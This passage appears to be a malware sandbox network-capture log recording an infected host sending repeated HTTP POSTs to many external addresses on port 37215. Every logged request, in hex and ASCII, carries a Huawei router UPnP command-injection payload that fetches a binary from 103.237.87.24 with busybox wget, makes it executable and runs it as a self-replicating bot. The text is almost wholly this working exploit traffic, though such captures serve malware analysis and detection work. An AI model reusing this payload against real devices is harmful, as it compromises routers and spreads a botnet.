69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  964192.168.2.134491841.40.143.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.400777102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  965192.168.2.1340114109.156.134.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402179003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  966192.168.2.1332918155.202.144.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402184963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  967192.168.2.134001041.233.159.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402194977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  968192.168.2.134927441.7.68.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402203083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  969192.168.2.135105841.215.12.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402264118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  970192.168.2.133580041.180.115.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402282000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  971192.168.2.1352164197.115.70.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402296066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  972192.168.2.1339170100.253.56.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.402301073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  973192.168.2.1341678190.197.195.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404278994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  974192.168.2.134883041.53.78.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404303074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
